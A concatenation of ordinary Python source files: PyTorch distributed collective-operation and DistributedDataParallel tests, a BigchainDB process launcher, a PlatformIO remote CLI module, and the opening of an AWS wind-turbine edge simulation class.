@skip_if_small_worldsize
def test_reduce_group_max(self):
group, group_id, rank = self._init_group_test()
self._test_reduce_helper(group, group_id, rank, dist.ReduceOp.MAX, -1, 10, 10)
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_reduce_full_group_sum(self):
group, group_id, rank = self._init_full_group_test()
self._test_reduce_helper(
group,
group_id,
rank,
dist.ReduceOp.SUM,
2,
10,
2 + (10 * (len(group) - 1)),
)
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_reduce_full_group_product(self):
group, group_id, rank = self._init_full_group_test()
self._test_reduce_helper(
group,
group_id,
rank,
dist.ReduceOp.PRODUCT,
2,
10,
reduce((lambda x, y: x * y), [10] * (len(group) - 1), 2),
)
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_reduce_full_group_min(self):
group, group_id, rank = self._init_full_group_test()
self._test_reduce_helper(group, group_id, rank, dist.ReduceOp.MIN, 1010, 1, 1)
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_reduce_full_group_max(self):
group, group_id, rank = self._init_full_group_test()
self._test_reduce_helper(group, group_id, rank, dist.ReduceOp.MAX, -1, 10, 10)
# ALL REDUCE
def _test_all_reduce_helper(
self,
group,
group_id,
rank,
op,
master_value,
worker_value,
expected_value,
cuda=False,
rank_to_GPU=None,
):
for src in group:
if rank == src:
tensor = _build_tensor(src + 1).fill_(master_value)
if cuda:
tensor = tensor.cuda(rank_to_GPU[rank][0])
dist.all_reduce(tensor, op, group_id)
self.assertEqual(tensor, _build_tensor(src + 1, expected_value))
else:
tensor = _build_tensor(src + 1).fill_(worker_value)
if cuda:
tensor = tensor.cuda(rank_to_GPU[rank][0])
dist.all_reduce(tensor, op, group_id)
self.assertEqual(tensor, _build_tensor(src + 1, expected_value))
self._barrier()
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_all_reduce_sum(self):
group, group_id, rank = self._init_global_test()
self._test_all_reduce_helper(
group,
group_id,
rank,
dist.ReduceOp.SUM,
2,
10,
2 + (10 * (len(group) - 1)),
)
@unittest.skipIf(
BACKEND != "gloo",
"Only Gloo backend will have CUDA allReduce tested",
)
@skip_if_no_cuda_distributed
@skip_if_no_gpu
def test_all_reduce_sum_cuda(self):
group, group_id, rank = self._init_global_test()
rank_to_GPU = self._init_multigpu_helper()
self._test_all_reduce_helper(
group,
group_id,
rank,
dist.ReduceOp.SUM,
2,
10,
2 + (10 * (len(group) - 1)),
True,
rank_to_GPU,
)
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_all_reduce_product(self):
group, group_id, rank = self._init_global_test()
self._test_all_reduce_helper(
group,
group_id,
rank,
dist.ReduceOp.PRODUCT,
2,
10,
reduce((lambda x, y: x * y), [10] * (len(group) - 1), 2),
)
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_all_reduce_min(self):
group, group_id, rank = self._init_global_test()
self._test_all_reduce_helper(
group, group_id, rank, dist.ReduceOp.MIN, 1010, 1, 1
)
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_all_reduce_max(self):
group, group_id, rank = self._init_global_test()
self._test_all_reduce_helper(
group, group_id, rank, dist.ReduceOp.MAX, -1, 10, 10
)
@skip_if_small_worldsize
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_all_reduce_group_sum(self):
group, group_id, rank = self._init_group_test()
self._test_all_reduce_helper(
group,
group_id,
rank,
dist.ReduceOp.SUM,
2,
10,
2 + (10 * (len(group) - 1)),
)
@skip_if_small_worldsize
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_all_reduce_group_product(self):
group, group_id, rank = self._init_group_test()
self._test_all_reduce_helper(
group,
group_id,
rank,
dist.ReduceOp.PRODUCT,
2,
10,
reduce((lambda x, y: x * y), [10] * (len(group) - 1), 2),
)
@skip_if_small_worldsize
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_all_reduce_group_min(self):
group, group_id, rank = self._init_group_test()
self._test_all_reduce_helper(
group, group_id, rank, dist.ReduceOp.MIN, 1010, 1, 1
)
@skip_if_small_worldsize
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_all_reduce_group_max(self):
group, group_id, rank = self._init_group_test()
self._test_all_reduce_helper(
group, group_id, rank, dist.ReduceOp.MAX, -1, 10, 10
)
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_all_reduce_full_group_sum(self):
group, group_id, rank = self._init_full_group_test()
self._test_all_reduce_helper(
group,
group_id,
rank,
dist.ReduceOp.SUM,
2,
10,
2 + (10 * (len(group) - 1)),
)
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_all_reduce_full_group_product(self):
group, group_id, rank = self._init_full_group_test()
self._test_all_reduce_helper(
group,
group_id,
rank,
dist.ReduceOp.PRODUCT,
2,
10,
reduce((lambda x, y: x * y), [10] * (len(group) - 1), 2),
)
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_all_reduce_full_group_min(self):
group, group_id, rank = self._init_full_group_test()
self._test_all_reduce_helper(
group, group_id, rank, dist.ReduceOp.MIN, 1010, 1, 1
)
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_all_reduce_full_group_max(self):
group, group_id, rank = self._init_full_group_test()
self._test_all_reduce_helper(
group, group_id, rank, dist.ReduceOp.MAX, -1, 10, 10
)
# SCATTER
def _test_scatter_helper(self, group, group_id, rank):
for dest in group:
tensor = _build_tensor(dest + 1, -1)
expected_tensor = _build_tensor(dest + 1, rank)
tensors = (
[_build_tensor(dest + 1, i) for i in group] if rank == dest else []
)
dist.scatter(tensor, src=dest, scatter_list=tensors, group=group_id)
self.assertEqual(tensor, expected_tensor)
self._barrier()
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support scatter")
def test_scatter(self):
group, group_id, rank = self._init_global_test()
self._test_scatter_helper(group, group_id, rank)
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support scatter")
@skip_if_small_worldsize
def test_scatter_group(self):
group, group_id, rank = self._init_group_test()
self._test_scatter_helper(group, group_id, rank)
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support scatter")
def test_scatter_full_group(self):
group, group_id, rank = self._init_full_group_test()
self._test_scatter_helper(group, group_id, rank)
# GATHER
def _test_gather_helper(self, group, group_id, rank):
for dest in group:
tensor = _build_tensor(dest + 1, rank)
tensors = (
[_build_tensor(dest + 1, -1) for i in group] if rank == dest else []
)
dist.gather(tensor, dst=dest, gather_list=tensors, group=group_id)
if rank == dest:
expected_tensors = [_build_tensor(dest + 1, i) for i in group]
for t1, t2 in zip(tensors, expected_tensors):
self.assertEqual(t1, t2)
self._barrier()
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_gather(self):
group, group_id, rank = self._init_global_test()
self._test_gather_helper(group, group_id, rank)
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
@skip_if_small_worldsize
def test_gather_group(self):
group, group_id, rank = self._init_group_test()
self._test_gather_helper(group, group_id, rank)
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_gather_full_group(self):
group, group_id, rank = self._init_full_group_test()
self._test_gather_helper(group, group_id, rank)
# ALL GATHER
def _test_all_gather_helper(
self, group, group_id, rank, cuda=False, rank_to_GPU=None
):
for dest in group:
tensor = _build_tensor(dest + 1, rank)
tensors = [_build_tensor(dest + 1, -1) for i in group]
if cuda:
tensor = tensor.cuda(rank_to_GPU[rank][0])
tensors = [t.cuda(rank_to_GPU[rank][0]) for t in tensors]
dist.all_gather(tensors, tensor, group_id)
expected_tensors = [_build_tensor(dest + 1, i) for i in group]
for t1, t2 in zip(tensors, expected_tensors):
self.assertEqual(t1, t2)
self._barrier()
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_all_gather(self):
group, group_id, rank = self._init_global_test()
self._test_all_gather_helper(group, group_id, rank)
@unittest.skipIf(BACKEND != "nccl", "Only Nccl supports CUDA all gather")
@unittest.skipIf(BACKEND == "nccl", "CUDA all gather skipped for NCCL")
@skip_if_no_cuda_distributed
@skip_if_no_gpu
def test_all_gather_cuda(self):
group, group_id, rank = self._init_global_test()
rank_to_GPU = self._init_multigpu_helper()
self._test_all_gather_helper(group, group_id, rank, True, rank_to_GPU)
@skip_if_small_worldsize
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_all_gather_group(self):
group, group_id, rank = self._init_group_test()
self._test_all_gather_helper(group, group_id, rank)
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_all_gather_full_group(self):
group, group_id, rank = self._init_full_group_test()
self._test_all_gather_helper(group, group_id, rank)
# BARRIER
def _test_barrier_helper(
self, group, group_id, rank, cuda=False, rank_to_GPU=None):
WAIT_TIME = 0.3 # seconds
for dest in group:
expected_time = torch.DoubleTensor(1).fill_(0.0)
if cuda:
expected_time = expected_time.cuda(rank_to_GPU[rank][0])
if dest == rank:
expected_time.fill_(time.time() + WAIT_TIME)
dist.broadcast(expected_time, dest, group_id)
time.sleep(WAIT_TIME + 0.1) # sleep a little bit longer
dist.barrier(group_id)
else:
dist.broadcast(expected_time, dest, group_id)
dist.barrier(group_id)
self.assertGreaterEqual(
float(time.time()),
float(expected_time[0]),
"destination rank: %d, my rank: %d" % (dest, rank) +
" (if you see this failure, please report in #14554)")
# Use higher timeout for the instance where the test runs
# against a subgroup and uses a CUDA tensor for expected time.
# The CUDA initialization for the participating processes can
# take long enough for the barrier timeout to trigger on the
# process that doesn't participate in the group.
self._barrier(timeout=20)
@skip_if_no_gpu
@unittest.skipIf(BACKEND == "mpi", "MPI doesn't supports GPU barrier")
def test_barrier_cuda(self):
group, group_id, rank = self._init_global_test()
rank_to_GPU = self._init_multigpu_helper()
self._test_barrier_helper(group, group_id, rank, True, rank_to_GPU)
@skip_if_small_worldsize
@skip_if_no_gpu
@unittest.skipIf(BACKEND == "mpi", "MPI doesn't supports GPU barrier")
def test_barrier_group_cuda(self):
group, group_id, rank = self._init_group_test()
rank_to_GPU = self._init_multigpu_helper()
self._test_barrier_helper(group, group_id, rank, True, rank_to_GPU)
@skip_if_small_worldsize
@skip_if_no_gpu
@unittest.skipIf(BACKEND == "mpi", "MPI doesn't supports GPU barrier")
def test_barrier_full_group_cuda(self):
group, group_id, rank = self._init_full_group_test()
rank_to_GPU = self._init_multigpu_helper()
self._test_barrier_helper(group, group_id, rank, True, rank_to_GPU)
@unittest.skipIf(BACKEND == "nccl", "NCCL does not support CPU barrier")
def test_barrier(self):
group, group_id, rank = self._init_global_test()
self._test_barrier_helper(group, group_id, rank)
@skip_if_small_worldsize
@unittest.skipIf(BACKEND == "nccl", "NCCL does not support CPU barrier")
def test_barrier_group(self):
group, group_id, rank = self._init_group_test()
self._test_barrier_helper(group, group_id, rank)
@unittest.skipIf(BACKEND == "nccl", "NCCL does not support CPU barrier")
def test_barrier_full_group(self):
group, group_id, rank = self._init_full_group_test()
self._test_barrier_helper(group, group_id, rank)
def _test_broadcast_multigpu_helper(self, group, group_id, rank, rank_to_GPU):
for src in group:
expected_tensor = _build_tensor(src + 1)
tensors = [
_build_tensor(src + 1, -1).cuda(device=i) for i in rank_to_GPU[rank]
]
if rank == src:
tensors[0] = expected_tensor.cuda(device=rank_to_GPU[rank][0])
dist.broadcast_multigpu(tensors, src, group_id)
for tensor in tensors:
self.assertEqual(tensor, expected_tensor)
self._barrier()
@unittest.skipIf(BACKEND == "mpi", "MPI doesn't support broadcast multigpu")
@unittest.skipIf(BACKEND == "nccl", "NCCL broadcast multigpu skipped")
@skip_if_no_gpu
def test_broadcast_multigpu(self):
group, group_id, rank = self._init_global_test()
rank_to_GPU = self._init_multigpu_helper()
self._test_broadcast_multigpu_helper(group, group_id, rank, rank_to_GPU)
def _test_all_reduce_multigpu_helper(
self,
group,
group_id,
rank,
rank_to_GPU,
op,
master_value,
worker_value,
expected_value,
):
for src in group:
if rank == src:
tensors = [
_build_tensor(src + 1, master_value).cuda(device=i)
for i in rank_to_GPU[rank]
]
else:
tensors = [
_build_tensor(src + 1, worker_value).cuda(device=i)
for i in rank_to_GPU[rank]
]
dist.all_reduce_multigpu(tensors, op, group_id)
expected_tensor = _build_tensor(src + 1, expected_value)
for tensor in tensors:
self.assertEqual(tensor, expected_tensor)
self._barrier()
@unittest.skipIf(BACKEND == "mpi", "MPI doesn't support broadcast multigpu")
@unittest.skipIf(BACKEND == "nccl", "CUDA all_reduce multigpu skipped for NCCL")
@skip_if_no_gpu
def test_all_reduce_multigpu(self):
group, group_id, rank = self._init_global_test()
rank_to_GPU = self._init_multigpu_helper()
self._test_all_reduce_multigpu_helper(
group,
group_id,
rank,
rank_to_GPU,
dist.ReduceOp.SUM,
2,
10,
(2 + 10 * (len(group) - 1)) * len(rank_to_GPU[0]),
)
def _test_reduce_multigpu_helper(
self,
group,
group_id,
rank,
rank_to_GPU,
op,
master_value,
worker_value,
expected_value,
):
for src in group:
if rank == src:
tensors = [
_build_tensor(src + 1, master_value).cuda(device=i)
for i in rank_to_GPU[rank]
]
dist.reduce_multigpu(tensors, src, op, group_id)
expected_tensor = _build_tensor(src + 1, expected_value)
self.assertEqual(tensors[0], expected_tensor)
else:
tensors = [
_build_tensor(src + 1, worker_value).cuda(device=i)
for i in rank_to_GPU[rank]
]
dist.reduce_multigpu(tensors, src, op, group_id)
self._barrier()
@unittest.skipIf(BACKEND != "nccl", "Only Nccl backend supports reduce multigpu")
@skip_if_no_gpu
def test_reduce_multigpu(self):
group, group_id, rank = self._init_global_test()
rank_to_GPU = self._init_multigpu_helper()
self._test_reduce_multigpu_helper(
group,
group_id,
rank,
rank_to_GPU,
dist.ReduceOp.SUM,
2,
10,
(2 + 10 * (len(group) - 1)) * len(rank_to_GPU[0]),
)
def _test_all_gather_multigpu_helper(self, group, group_id, rank, rank_to_GPU):
for dest in group:
tensors = [
_build_tensor(dest + 1).cuda(device=i) for i in rank_to_GPU[rank]
]
# construct expected output along with
# a place holder to receive all gather results
output_tensors = []
expected_output = []
output_per_gpu = (
[_build_tensor(dest + 1, -1)] * len(rank_to_GPU[0]) * len(group)
)
expected_per_gpu = (
[_build_tensor(dest + 1)] * len(rank_to_GPU[0]) * len(group)
)
for gpu in rank_to_GPU[rank]:
output_tensors.append([t.cuda(device=gpu) for t in output_per_gpu])
expected_output.append([t.cuda(device=gpu) for t in expected_per_gpu])
dist.all_gather_multigpu(output_tensors, tensors, group_id)
self.assertEqual(output_tensors, expected_output)
self._barrier()
@unittest.skipIf(BACKEND != "nccl", "Only Nccl backend supports allgather multigpu")
@skip_if_no_gpu
def test_all_gather_multigpu(self):
group, group_id, rank = self._init_global_test()
rank_to_GPU = self._init_multigpu_helper()
self._test_all_gather_multigpu_helper(group, group_id, rank, rank_to_GPU)
def _model_step(self, model):
for param in model.parameters():
if param.grad is not None:
param.data += param.grad
param.grad = None
def _prepare_dummy_data(self, local_bs):
# global_bs for DDP should be divisible by WORLD_SIZE
global_bs = int(WORLD_SIZE) * local_bs
input_cpu = torch.randn(global_bs, 2)
target = torch.randn(global_bs, 4)
loss = nn.MSELoss()
return global_bs, input_cpu, target, loss
# END TO END TEST FOR DISTRIBUTEDDATAPARALLEL
def _test_DDP_helper(self, model, input_var, target, loss):
model.train()
output = model(input_var)
l = loss(output, target)
l.backward()
def _assert_equal_param(self, param_gpu, param_DDP):
self.assertEqual(len(param_gpu), len(param_DDP))
for p_gpu, p_DDP in zip(param_gpu, param_DDP):
self.assertEqual(p_gpu, p_DDP)
def _test_DDP_5iter(
self, model_base, model_DDP, input, target, loss, local_bs, rank, batch_size, test_save
):
for idx in range(5):
# single cpu/gpu training
self._test_DDP_helper(model_base, input, target, loss)
# DDP training, DDP scatters subsets of input_cpu to nodes/GPUs
self._test_DDP_helper(
model_DDP,
input[rank * local_bs: (rank + 1) * local_bs],
target[rank * local_bs: (rank + 1) * local_bs],
loss,
)
# Update weights and run a second iteration to shake out errors
self._model_step(model_base)
self._model_step(model_DDP)
self._assert_equal_param(
list(model_base.parameters()), list(model_DDP.module.parameters())
)
# Shuffle the input so that DDP input is different
input = input[torch.randperm(batch_size)]
# save the model in the middle and reload
if test_save and idx == 2 and INIT_METHOD.startswith("file://"):
_, filename = tempfile.mkstemp(prefix=FOLDER)
torch.save(model_DDP, filename)
model_DDP = torch.load(filename)
with tempfile.TemporaryFile() as tmp_file:
torch.save(model_DDP, tmp_file)
tmp_file.seek(0)
saved_model = torch.load(tmp_file)
for k in model_DDP.state_dict():
self.assertEqual(model_DDP.state_dict()[k],
saved_model.state_dict()[k])
def _test_DistributedDataParallel(self, gpu_subset, rank, output_device=None):
# Run a simple end to end DDP model, use result of single node model
# as baseline
# cpu training setup
model = DDP_NET
# single gpu training setup
model_gpu = copy.deepcopy(model)
model_gpu.cuda(gpu_subset[0])
# DDP training setup
model_DDP = copy.deepcopy(model)
model_DDP.cuda(gpu_subset[0])
model_DDP = nn.parallel.DistributedDataParallel(
model_DDP, device_ids=gpu_subset
)
# test serializable/unserializable
if INIT_METHOD.startswith("file://"):
_, filename = tempfile.mkstemp(prefix=FOLDER)
torch.save(model_DDP, filename)
model_DDP = torch.load(filename)
# dummy data initialization
local_bs = len(gpu_subset)
global_bs, input_cpu, target, loss = self._prepare_dummy_data(local_bs)
# check two model parameters over 5 iterations
self._test_DDP_5iter(
model_gpu,
model_DDP,
input_cpu.cuda(gpu_subset[0]),
target.cuda(gpu_subset[0]),
loss,
local_bs,
rank,
global_bs,
True
)
self._barrier()
@unittest.skipIf(
BACKEND == "nccl", "nccl does not support DistributedDataParallelCPU"
)
def test_DistributedDataParallelCPU(self):
# Run a simple end to end DDP-CPU model, use result of single node
# model as baseline
group, group_id, rank = self._init_global_test()
# cpu training setup
model_base = DDP_NET
# DDP-CPU training setup
model_DDP = copy.deepcopy(model_base)
model_DDP = nn.parallel.DistributedDataParallelCPU(model_DDP)
# dummy data initialization
local_bs = 2
global_bs, input_cpu, target, loss = self._prepare_dummy_data(local_bs)
# check two model parameters over 5 iterations
# TODO: add state pickling support for DistributedDataParallelCPU
self._test_DDP_5iter(
model_base, model_DDP, input_cpu, target, loss, local_bs, rank, global_bs, False
)
self._barrier()
@unittest.skipIf(BACKEND != 'nccl' and BACKEND != 'gloo',
"Only Nccl & Gloo backend support DistributedDataParallel")
@skip_if_no_cuda_distributed
@skip_if_no_gpu
def test_DistributedDataParallel(self):
group, group_id, rank = self._init_global_test()
rank_to_GPU = self._init_multigpu_helper()
gpus = list(rank_to_GPU[rank])
self._test_DistributedDataParallel(gpu_subset=gpus, rank=rank)
# test output_device
self._test_DistributedDataParallel(gpu_subset=gpus, rank=rank, output_device=torch.device('cuda'))
# test device_ids
gpus = list(map(lambda i: torch.device('cuda:' + str(i)), gpus))
self._test_DistributedDataParallel(gpu_subset=gpus, rank=rank, output_device=torch.device('cuda'))
if BACKEND == "gloo" or BACKEND == "nccl":
WORLD_SIZE = os.environ["WORLD_SIZE"]
class TestDistBackend(TestCase, _DistTestBase):
MANAGER_PROCESS_RANK = -1
@staticmethod
def manager_join(fn):
@wraps(fn)
def wrapper(self):
if self.rank == self.MANAGER_PROCESS_RANK:
self._join_and_reduce(fn)
else:
fn(self)
return wrapper
@classmethod
def setUpClass(cls):
os.environ["MASTER_ADDR"] = str(MASTER_ADDR)
os.environ["MASTER_PORT"] = str(MASTER_PORT)
os.environ["WORLD_SIZE"] = str(WORLD_SIZE)
for attr in dir(cls):
if attr.startswith("test"):
fn = getattr(cls, attr)
setattr(cls, attr, cls.manager_join(fn))
def setUp(self):
# Adding this hack until we fix the FileStore to delete its
# content at the end
global INIT_METHOD
if INIT_METHOD.startswith("file://"):
_, filename = tempfile.mkstemp(prefix=FOLDER)
INIT_METHOD = "file://{}".format(filename)
self.processes = []
self.rank = self.MANAGER_PROCESS_RANK
Barrier.init()
for rank in range(int(WORLD_SIZE)):
self.processes.append(self._spawn_process(rank))
def tearDown(self):
for p in self.processes:
p.terminate()
def _spawn_process(self, rank):
os.environ["RANK"] = str(rank)
name = "process " + str(rank)
process = multiprocessing.Process(target=self._run, name=name, args=(rank,))
process.start()
return process
def _run(self, rank):
self.rank = rank
try:
dist.init_process_group(
init_method=INIT_METHOD,
backend=BACKEND,
world_size=int(WORLD_SIZE),
rank=self.rank
)
except RuntimeError as e:
if "recompile" in e.args[0]:
sys.exit(SKIP_IF_BACKEND_UNAVAILABLE)
# sys.exit(0)
raise
# Execute barrier prior to running test to ensure that every process
# has finished initialization and that the following test
# immediately exiting due to a skip doesn't cause flakiness.
self._barrier()
# self.id() == e.g. '__main__.TestDistributed.test_get_rank'
# We're retreiving a corresponding test and executing it.
getattr(self, self.id().split(".")[2])()
self._barrier()
dist.destroy_process_group()
sys.exit(0)
def _join_and_reduce(self, fn):
skip_ok = (
getattr(fn, "skip_if_no_cuda_distributed", False) or
getattr(fn, "skip_if_no_gpu", False) or
getattr(fn, "skip_if_small_worldsize", False)
)
join_timeout = get_timeout(self.id())
for rank, process in enumerate(self.processes):
process.join(join_timeout)
self.assertFalse(
process.is_alive(),
"Timeout waiting for rank %d to terminate" % rank)
first_process = self.processes[0]
for p in self.processes:
self.assertEqual(p.exitcode, first_process.exitcode)
if first_process.exitcode == SKIP_IF_BACKEND_UNAVAILABLE:
raise unittest.SkipTest("Compiled without the " + BACKEND + " backend")
if skip_ok:
# do this first so we don't give an error message about
# mismatched exit codes if the first isn't valid
assert (
first_process.exitcode == 0 or
first_process.exitcode == SKIP_IF_NO_CUDA_EXIT_CODE or
first_process.exitcode == SKIP_IF_NO_GPU_EXIT_CODE or
first_process.exitcode == SKIP_IF_SMALL_WORLDSIZE_EXIT_CODE
)
if first_process.exitcode == SKIP_IF_NO_CUDA_EXIT_CODE:
raise unittest.SkipTest("cuda is not available")
if first_process.exitcode == SKIP_IF_NO_GPU_EXIT_CODE:
raise unittest.SkipTest(
"One unique gpu per process is not available"
)
if first_process.exitcode == SKIP_IF_SMALL_WORLDSIZE_EXIT_CODE:
raise unittest.SkipTest("worldsize is too small to run group tests")
self.assertEqual(first_process.exitcode, 0)
elif BACKEND == "mpi":
WORLD_SIZE = os.environ["WORLD_SIZE"]
dist.init_process_group(init_method=INIT_METHOD, backend="mpi")
class TestMPI(TestCase, _DistTestBase):
pass
if __name__ == "__main__":
assert (
not torch.cuda._initialized
), "test_distributed must not have initialized CUDA context on main process"
run_tests()
|
processes.py
|
import logging
import multiprocessing as mp
import bigchaindb
from bigchaindb.pipelines import vote, block, election, stale
from bigchaindb.web import server
logger = logging.getLogger(__name__)
BANNER = """
****************************************************************************
* *
* Initialization complete. BigchainDB Server is ready and waiting. *
* You can send HTTP requests via the HTTP API documented in the *
* BigchainDB Server docs at: *
* https://bigchaindb.com/http-api *
* *
* Listening to client connections on: {:<15} *
* *
****************************************************************************
"""
def start():
logger.info('Initializing BigchainDB...')
# start the processes
logger.info('Starting block')
block.start()
logger.info('Starting voter')
vote.start()
logger.info('Starting stale transaction monitor')
stale.start()
logger.info('Starting election')
election.start()
# start the web api
app_server = server.create_server(bigchaindb.config['server'])
p_webapi = mp.Process(name='webapi', target=app_server.run)
p_webapi.start()
# start message
logger.info(BANNER.format(bigchaindb.config['server']['bind']))
|
remote.py
|
# Copyright (c) 2014-present PlatformIO <contact@platformio.org>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import threading
from os import getcwd
from os.path import isfile, join
from tempfile import mkdtemp
from time import sleep
import click
from platformio import exception, util
from platformio.commands.device import device_monitor as cmd_device_monitor
from platformio.managers.core import pioplus_call
# pylint: disable=unused-argument
@click.group("remote", short_help="PIO Remote")
@click.option("-a", "--agent", multiple=True)
def cli(**kwargs):
pass
@cli.group("agent", short_help="Start new agent or list active")
def remote_agent():
pass
@remote_agent.command("start", short_help="Start agent")
@click.option("-n", "--name")
@click.option("-s", "--share", multiple=True, metavar="E-MAIL")
@click.option(
"-d",
"--working-dir",
envvar="PLATFORMIO_REMOTE_AGENT_DIR",
type=click.Path(
file_okay=False, dir_okay=True, writable=True, resolve_path=True))
def remote_agent_start(**kwargs):
pioplus_call(sys.argv[1:])
@remote_agent.command("reload", short_help="Reload agents")
def remote_agent_reload():
pioplus_call(sys.argv[1:])
@remote_agent.command("list", short_help="List active agents")
def remote_agent_list():
pioplus_call(sys.argv[1:])
@cli.command(
"update", short_help="Update installed Platforms, Packages and Libraries")
@click.option(
"-c",
"--only-check",
is_flag=True,
help="Do not update, only check for new version")
def remote_update(only_check):
pioplus_call(sys.argv[1:])
@cli.command("run", short_help="Process project environments remotely")
@click.option("-e", "--environment", multiple=True)
@click.option("-t", "--target", multiple=True)
@click.option("--upload-port")
@click.option(
"-d",
"--project-dir",
default=getcwd,
type=click.Path(
exists=True,
file_okay=True,
dir_okay=True,
writable=True,
resolve_path=True))
@click.option("--disable-auto-clean", is_flag=True)
@click.option("-r", "--force-remote", is_flag=True)
@click.option("-s", "--silent", is_flag=True)
@click.option("-v", "--verbose", is_flag=True)
def remote_run(**kwargs):
pioplus_call(sys.argv[1:])
@cli.command("test", short_help="Remote Unit Testing")
@click.option("--environment", "-e", multiple=True, metavar="<environment>")
@click.option("--ignore", "-i", multiple=True, metavar="<pattern>")
@click.option("--upload-port")
@click.option("--test-port")
@click.option(
"-d",
"--project-dir",
default=getcwd,
type=click.Path(
exists=True,
file_okay=False,
dir_okay=True,
writable=True,
resolve_path=True))
@click.option("-r", "--force-remote", is_flag=True)
@click.option("--without-building", is_flag=True)
@click.option("--without-uploading", is_flag=True)
@click.option("--verbose", "-v", is_flag=True)
def remote_test(**kwargs):
pioplus_call(sys.argv[1:])
@cli.group("device", short_help="Monitor remote device or list existing")
def remote_device():
pass
@remote_device.command("list", short_help="List remote devices")
@click.option("--json-output", is_flag=True)
def device_list(json_output):
pioplus_call(sys.argv[1:])
@remote_device.command("monitor", short_help="Monitor remote device")
@click.option("--port", "-p", help="Port, a number or a device name")
@click.option(
"--baud", "-b", type=int, default=9600, help="Set baud rate, default=9600")
@click.option(
"--parity",
default="N",
type=click.Choice(["N", "E", "O", "S", "M"]),
help="Set parity, default=N")
@click.option(
"--rtscts", is_flag=True, help="Enable RTS/CTS flow control, default=Off")
@click.option(
"--xonxoff",
is_flag=True,
help="Enable software flow control, default=Off")
@click.option(
"--rts",
default=None,
type=click.IntRange(0, 1),
help="Set initial RTS line state")
@click.option(
"--dtr",
default=None,
type=click.IntRange(0, 1),
help="Set initial DTR line state")
@click.option("--echo", is_flag=True, help="Enable local echo, default=Off")
@click.option(
"--encoding",
default="UTF-8",
help="Set the encoding for the serial port (e.g. hexlify, "
"Latin1, UTF-8), default: UTF-8")
@click.option("--filter", "-f", multiple=True, help="Add text transformation")
@click.option(
"--eol",
default="CRLF",
type=click.Choice(["CR", "LF", "CRLF"]),
help="End of line mode, default=CRLF")
@click.option(
"--raw", is_flag=True, help="Do not apply any encodings/transformations")
@click.option(
"--exit-char",
type=int,
default=3,
help="ASCII code of special character that is used to exit "
"the application, default=3 (Ctrl+C)")
@click.option(
"--menu-char",
type=int,
default=20,
help="ASCII code of special character that is used to "
"control miniterm (menu), default=20 (DEC)")
@click.option(
"--quiet",
is_flag=True,
help="Diagnostics: suppress non-error messages, default=Off")
@click.pass_context
def device_monitor(ctx, **kwargs):
def _tx_target(sock_dir):
try:
pioplus_call(sys.argv[1:] + ["--sock", sock_dir])
except exception.ReturnErrorCode:
pass
sock_dir = mkdtemp(suffix="pioplus")
sock_file = join(sock_dir, "sock")
try:
t = threading.Thread(target=_tx_target, args=(sock_dir, ))
t.start()
while t.is_alive() and not isfile(sock_file):
sleep(0.1)
if not t.is_alive():
return
kwargs['port'] = util.get_file_contents(sock_file)
ctx.invoke(cmd_device_monitor, **kwargs)
t.join(2)
finally:
util.rmtree_(sock_dir)
|
windfarm.py
|
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: MIT-0
import threading
import math
import random
import pywt
import numpy as np
import pandas as pd
import logging
import time
import os
from turbine import WindTurbine
from edgeagentclient import EdgeAgentClient
class WindTurbineFarm(object):
"""
This is the application class. It is respoisible for:
- Creating virtual edge devices (as threads)
- Launch one Edge Agent in each virtual device
- Load the Anomaly detection for the Wind Turbine in the Edge Agent
- Launch the Virtual Wind Turbines
- Launch a Edge Agent Client that integrates the Wind Turbine with the Edge Device
- Display the UI
"""
def __init__(self, n_turbines):
self.artifacts_path = os.environ.get("ARTIFACTS_PATH")
self.raw_data = pd.read_csv(f'{self.artifacts_path}/dataset_wind.csv.gz', compression="gzip", sep=',', low_memory=False).values
self.n_turbines = n_turbines
self.turbines = [WindTurbine(i, self.raw_data) for i in range(self.n_turbines)]
self.data_buffer = [[] for i in range(self.n_turbines)]
## launch edge agent clients
self.edge_agent = EdgeAgentClient('/tmp/aws.greengrass.SageMakerEdgeManager.sock')
self.model_meta = [{'model_name':None} for i in range(self.n_turbines)]
# we need to load the statistics computed in the data prep notebook
# these statistics will be used to compute normalize the input
self.raw_std = np.load(f'{self.artifacts_path}/raw_std.npy')
self.mean = np.load(f'{self.artifacts_path}/mean.npy')
self.std = np.load(f'{self.artifacts_path}/std.npy')
